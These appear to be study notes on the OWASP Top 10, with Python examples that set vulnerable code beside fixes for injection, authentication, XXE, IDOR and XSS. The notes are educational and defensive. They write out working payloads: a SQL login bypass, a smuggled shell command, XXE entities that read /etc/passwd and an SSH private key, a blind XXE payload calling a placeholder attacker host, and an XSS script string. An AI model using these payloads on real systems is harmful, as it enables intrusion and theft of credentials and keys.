OWASP top 10

The Open Web Application Security Project's top ten security risks for web applications. Let's go!

1 - Injections

This is the most common issue: user input ends up being interpreted as part of a command or query and executed. Types include SQL injection, where the attacker can run their own queries against the database, and command injection, where the attacker gets commands executed on the target machine's operating system.

Either vector can let the attacker read, modify, insert or delete information in the database, or execute arbitrary commands on the host and escalate privileges.

Defences: validate input against a list of allowed characters or formats (an allowlist) rather than trying to strip out the dangerous ones, use parameterised queries so data is never concatenated into SQL text, and avoid handing user input to a shell at all.

OS command injection occurs when the web application builds an operating-system command from user input and hands it to a shell on the hosting machine.

1 - Practical Command Injection

Blind command injection is when the command runs but its output is not returned in the response, so you have to infer success some other way (a time delay, a DNS lookup, a file appearing). Active command injection is when the output is returned in the response back to the attacker.
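The two injection types side by side, as an added example (not code from the original notes). SQL injection is shown against an in-memory SQLite table of made-up users; command injection is shown with a hypothetical "ping a host" feature that only builds the command and splits it the way `/bin/sh` would, so nothing is actually run through a shell.

```python
"""Added example (not from the original notes): SQL injection and OS command
injection, vulnerable form next to the hardened form.

Sample users are constructed; the ping feature is hypothetical and never executes.
"""
import re
import shlex
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: two users in an in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (name, password) VALUES (?, ?)",
        [("anthony", "hunter2"), ("falcon", "s3cret")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, name: str, password: str) -> list:
    """User input is pasted into the SQL text, so a quote in the input
    changes the query's structure instead of staying data."""
    sql = f"SELECT name FROM users WHERE name = '{name}' AND password = '{password}'"
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn: sqlite3.Connection, name: str, password: str) -> list:
    """Parameterised query: the values travel separately from the SQL, so the
    same payload is compared literally and matches nothing."""
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (name, password))]


# Allowlist for the host parameter: hostname / IPv4 characters only.
HOST_RE = re.compile(r"[A-Za-z0-9.-]{1,253}")


def ping_command_vulnerable(host: str) -> str:
    """Builds one shell string for subprocess.run(cmd, shell=True):
    the ';' in '8.8.8.8; id' ends ping and starts a second command."""
    return f"ping -c 1 {host}"


def ping_command_safe(host: str) -> list:
    """Validate against the allowlist, then return an argv list for
    subprocess.run(argv) with no shell, so metacharacters are never interpreted."""
    if not HOST_RE.fullmatch(host):
        raise ValueError(f"rejected host: {host!r}")
    return ["ping", "-c", "1", host]


def count_shell_commands(cmd: str) -> int:
    """How many commands /bin/sh would run for this string: tokenise it the way
    the shell does and count the ; | && || separators."""
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    tokens = list(lexer)
    return 1 + sum(tok in (";", "|", "&&", "||") for tok in tokens)


if __name__ == "__main__":
    db = make_db()
    payload = "' OR '1'='1"
    print("vulnerable:", login_vulnerable(db, "anthony", payload))  # both users
    print("safe:      ", login_safe(db, "anthony", payload))        # []
    print(count_shell_commands(ping_command_vulnerable("8.8.8.8; id")))  # 2
```

The vulnerable query becomes `... name = 'anthony' AND password = '' OR '1'='1'`; since AND binds tighter than OR, the row filter is true for every user. The parameterised version sends the same text as a value and finds nobody.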

2 - Broken Authentication

Issues with authentication include weak passwords, susceptibility to brute-force attacks and weak or predictable session tokens. To counter these, the website should enforce strong password use, lock out a user (or rate-limit) after a given number of failed login attempts, use session tokens that can't be guessed, and use multi-factor authentication.

One way to take advantage of broken authentication is to register a user with the same name as an existing user but with a slight change, e.g. " anthony" (leading space) instead of "anthony". If the application does not normalise usernames consistently at registration and at lookup, logging in as " anthony" ends up showing the information for "anthony".
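The " anthony" trick and the fix, as an added example (not code from the original notes). It models a hypothetical app whose registration stores usernames exactly as typed while the profile lookup trims them, then a version that normalises the name once, rejects the near-duplicate, and locks the account after repeated failures. Users and secrets are made up.

```python
"""Added example (not from the original notes): username normalisation and
lockout. The two stores are hypothetical; users and secrets are constructed."""
import unicodedata
from typing import Optional

MAX_FAILED_LOGINS = 5


class VulnerableUserStore:
    def __init__(self) -> None:
        self.users: dict = {}  # raw username -> record

    def register(self, username: str, password: str, secret: str) -> None:
        # Only an exact duplicate is rejected, so ' anthony' is a brand-new account.
        if username in self.users:
            raise ValueError("username taken")
        self.users[username] = {"password": password, "secret": secret}

    def login(self, username: str, password: str) -> bool:
        rec = self.users.get(username)
        return rec is not None and rec["password"] == password

    def profile(self, username: str) -> Optional[dict]:
        # The profile page trims whitespace "to be helpful": ' anthony' now
        # matches the real anthony's record, which was inserted first.
        wanted = username.strip()
        for stored, rec in self.users.items():
            if stored.strip() == wanted:
                return rec
        return None


def normalize(username: str) -> str:
    """One canonical form used everywhere: Unicode-normalised, trimmed, case-folded."""
    return unicodedata.normalize("NFKC", username).strip().casefold()


class SafeUserStore:
    def __init__(self) -> None:
        self.users: dict = {}  # normalised username -> record

    def register(self, username: str, password: str, secret: str) -> None:
        key = normalize(username)
        if not key or key in self.users:
            raise ValueError("username taken or empty")
        self.users[key] = {"password": password, "secret": secret, "failures": 0}

    def login(self, username: str, password: str) -> bool:
        rec = self.users.get(normalize(username))
        if rec is None or rec["failures"] >= MAX_FAILED_LOGINS:
            return False  # unknown user or locked out: same answer either way
        if rec["password"] != password:
            rec["failures"] += 1
            return False
        rec["failures"] = 0
        return True

    def profile(self, username: str) -> Optional[dict]:
        return self.users.get(normalize(username))
```

The point is that normalisation has to happen once, at a single choke point, and every lookup has to use the same form; the bug is not the trimming itself but trimming in one place and not the other.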

3 - Sensitive Data Exposure

Sometimes webpages just leave a flat-file database (an SQLite file, say) reachable from the web root. Download it and pull the info out, including any password hashes to crack - check ./01_hasing_notes.md

4 - XML External Entity

Basically abuses the way XML input is parsed: if the parser resolves external entities, an attacker can read local files, make the server issue requests on their behalf, or cause a denial of service.

These can be broken down into in-band XXE and out-of-band (OOB, or blind) XXE. In-band attacks receive an immediate response containing the result. Out-of-band (blind) XXE means there is no immediate response, so the data has to be exfiltrated another way, e.g. to a server the attacker controls.

But what is XML

XML stands for eXtensible Markup Language, a format for structuring data that is both machine readable and human readable. Sounds a bit like markdown, which is what this document is written in, except XML is for data rather than text formatting.

Some key points of XML: it is platform independent; the data stored can be altered without changing the presentation; documents can be validated against a DTD or an XML Schema (XSD) so that structural errors are caught; and because it is platform independent it can be shared between systems without issue.

Syntax

The syntax of XML goes something like:

    <?xml version="1.0" encoding="UTF-8"?>
    <mail>
       <to>falcon</to>
       <from>feast</from>
       <subject>About XXE</subject>
       <text>Teach about XXE</text>
    </mail>

Looks like HTML, but the tags are whatever you define, every tag must be closed, and there is exactly one root element.

DTD

The DTD is the syntax validator that defines the structure and allowed elements. DTD stands for Document Type Definition. Because, you know, it defines the document type. Example of a DTD that could be used (this one describes a note document, not the mail one above):

    <!DOCTYPE note [
      <!ELEMENT note (to,from,heading,body)>
      <!ELEMENT to (#PCDATA)>
      <!ELEMENT from (#PCDATA)>
      <!ELEMENT heading (#PCDATA)>
      <!ELEMENT body (#PCDATA)>
    ]>

Example

Let’s actually do some testing now

This will sometimes work to read a file (the parser resolves the external entity and echoes the file contents back in the response):

    <?xml version="1.0"?>
    <!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
    <root>&read;</root>

Instead of reading /etc/passwd we can read /home/falcon/.ssh/id_rsa, which gives us the SSH private key for the user "falcon" (a username we got from the passwd file), provided the account the parser runs as can read that file.
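The in-band and blind (OOB) payloads described in this section, plus a server-side pre-check that refuses any document carrying a DTD before it reaches the parser, as an added example (not code from the original notes). The attacker DTD URL is a placeholder, and the clean sample is the mail document from above.

```python
"""Added example (not from the original notes): XXE payload shapes and a
defensive pre-check. ATTACKER_DTD_URL is a placeholder, not a real host."""
import re
import xml.etree.ElementTree as ET

ATTACKER_DTD_URL = "http://attacker.example/evil.dtd"  # placeholder (assumption)


def inband_xxe(path: str, root: str = "root") -> str:
    """In-band: the entity is resolved by the parser and the file's contents
    come back in the response body."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE {root} [<!ENTITY read SYSTEM "file://{path}">]>\n'
        f"<{root}>&read;</{root}>"
    )


def oob_xxe(root: str = "root") -> str:
    """Blind variant: nothing is echoed, so a parameter entity (the % form)
    makes the parser fetch a second DTD from the attacker, and the exfiltration
    is staged in that external DTD."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE {root} [<!ENTITY % xxe SYSTEM "{ATTACKER_DTD_URL}"> %xxe;]>\n'
        f"<{root}>blind</{root}>"
    )


DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
EXTERNAL_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?:%\s*)?\w+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE
)


def classify(xml_text: str) -> str:
    """'external-entity' if a SYSTEM/PUBLIC entity is declared, 'doctype' if
    there is any DTD at all, otherwise 'clean'. API input rarely needs a DTD."""
    if EXTERNAL_ENTITY_RE.search(xml_text):
        return "external-entity"
    if DOCTYPE_RE.search(xml_text):
        return "doctype"
    return "clean"


def safe_parse(xml_text: str) -> ET.Element:
    """Reject anything with a DTD up front, then parse. This is defence in depth
    on top of configuring the real parser not to resolve external entities."""
    if classify(xml_text) != "clean":
        raise ValueError("DTD / external entity declarations are not accepted")
    return ET.fromstring(xml_text)


# The mail document from the notes above, used as the clean sample.
MAIL_XML = """<?xml version="1.0" encoding="UTF-8"?>
<mail>
   <to>falcon</to>
   <from>feast</from>
   <subject>About XXE</subject>
   <text>Teach about XXE</text>
</mail>"""
```

Rejecting the DOCTYPE outright is the simplest rule for an API that only ever expects plain data documents; where a DTD is legitimately needed, the parser itself has to be configured to not load external entities.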

5 - Broken Access Control

This one is pretty simple: if you can view pages or data you are not supposed to (another user's records, admin functions), then the access control is broken.

IDOR - Insecure Direct Object Reference: the application uses a user-supplied identifier (e.g. ?id=123 in the URL) to look up an object without checking that the caller is allowed to see it, so changing the number gets you someone else's object. IE - a type of access control vulnerability
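An IDOR in a hypothetical /notes/<id> handler and the ownership check that fixes it, as an added example (not code from the original notes). The notes, their sequential ids and the users are made up.

```python
"""Added example (not from the original notes): IDOR and the authorisation
check that fixes it. Data and endpoint are hypothetical."""
import secrets
from typing import Callable, Iterable, Optional

# Constructed sample data: sequential ids are what make enumeration trivial.
NOTES = {
    101: {"owner": "anthony", "body": "dentist on friday"},
    102: {"owner": "falcon", "body": "draft report, do not share"},
}


def get_note_vulnerable(current_user: str, note_id: int) -> Optional[dict]:
    """The caller is authenticated, but the note's owner is never compared
    to the caller: any logged-in user can read any note by id."""
    return NOTES.get(note_id)


def get_note_safe(current_user: str, note_id: int) -> Optional[dict]:
    """Authorise every object access. A note that exists but is not yours gets
    the same 'nothing here' answer as a missing one, so valid ids cannot be
    confirmed by probing."""
    note = NOTES.get(note_id)
    if note is None or note["owner"] != current_user:
        return None
    return note


def enumerate_notes(
    current_user: str,
    fetch: Callable[[str, int], Optional[dict]],
    ids: Iterable[int],
) -> list:
    """What an attacker does with one valid login: walk the id space."""
    return [i for i in ids if fetch(current_user, i) is not None]


def public_reference(note_id: int, index: dict) -> str:
    """Defence in depth: hand out a random token instead of the raw id and keep
    the mapping server-side. The ownership check above is still required;
    unguessable ids only make enumeration impractical, they are not authorisation."""
    token = secrets.token_urlsafe(16)
    index[token] = note_id
    return token
```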

6 - Security Misconfiguration

Default usernames and passwords fall under this category. Yep. It happens. A LOT. Also HTTP headers that reveal versions (Server, X-Powered-By), overly detailed error messages (stack traces), services and features that aren't needed, and just misconfigured resources (public S3 buckets).

7 - XSS

Cross Site Scripting is a vulnerability that lets an attacker run their own JavaScript in a victim's browser, in the context of the vulnerable site (so with the victim's cookies and session). The three types of XSS are Stored, Reflected and DOM-Based. Stored attacks are the most dangerous: the malicious string is saved by the website (e.g. in its database, via a comment or chat message) and served to every user who views that page. This happens when user input is not sanitised on the way in or encoded on the way out. The next type is Reflected XSS, where the payload is in the victim's own request (a URL parameter, say) and the website echoes it straight back into the response. In this way the script is "reflected" off the website and back to the victim, which usually means tricking the user into clicking a malicious link. Finally there is DOM-Based XSS, where the server never sees the payload: the site's own client-side JavaScript reads untrusted data (e.g. from location.hash) and writes it into the page with something like innerHTML.

Payloads might include popups (a JavaScript alert box, mostly to prove execution), writing HTML so the target is shown whatever HTML you want them to see, an XSS keylogger where all the user's keystrokes are recorded and sent to the attacker, and port scanners that use the victim's browser as a mini local port scanner.

Hey here’s a fun website: XSS-Payloads.com

OH… Basically you are just putting HTML in the website somehow and the browser executes it. For example, you might put <h1>Hello!</h1> and it would render as a heading in a chat box. Or you could put a script tag with an alert in it and it would make a popup for everyone in the chat, because the stored message is served to every user who views it.
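The chat-box case from above, rendered without and with output encoding, as an added example (not code from the original notes). It also shows the two other contexts where plain HTML escaping is not enough: attribute values and data embedded in a script block. Messages are constructed.

```python
"""Added example (not from the original notes): output encoding against XSS,
per context. Chat messages below are constructed sample data."""
import html
import json

MESSAGES = [
    {"user": "anthony", "text": "hi all"},
    {"user": "falcon", "text": "<h1>Hello!</h1>"},
    {"user": "feast", "text": '<script>alert("xss")</script>'},
]


def render_vulnerable(messages) -> str:
    """Stored text is concatenated straight into the page: markup in one
    message becomes markup for everyone who loads the chat."""
    return "".join(f"<p><b>{m['user']}</b>: {m['text']}</p>" for m in messages)


def render_safe(messages) -> str:
    """html.escape converts & < > \" ' to entities, so the browser displays the
    characters instead of parsing them as tags."""
    return "".join(
        f"<p><b>{html.escape(m['user'])}</b>: {html.escape(m['text'])}</p>"
        for m in messages
    )


def attr_context(value: str) -> str:
    """Inside an HTML attribute the quotes must be escaped too (quote=True is
    the default) so the value cannot close the attribute and add an event handler."""
    return html.escape(value, quote=True)


def js_context(value: str) -> str:
    """Data placed inside a <script> block: JSON-encode it, then break '</' so a
    '</script>' in the data cannot end the script element early."""
    return json.dumps(value).replace("</", "<\\/")


def safe_link(href: str) -> str:
    """URL contexts need a scheme allowlist on top of escaping: 'javascript:'
    URLs are perfectly valid attribute text but execute when clicked."""
    if not href.lower().startswith(("http://", "https://")):
        href = "#"
    return f'<a href="{attr_context(href)}">link</a>'
```

Encoding is chosen by where the data lands (HTML body, attribute, script, URL), not by what the data looks like; stripping `<script>` on input is the approach that keeps getting bypassed.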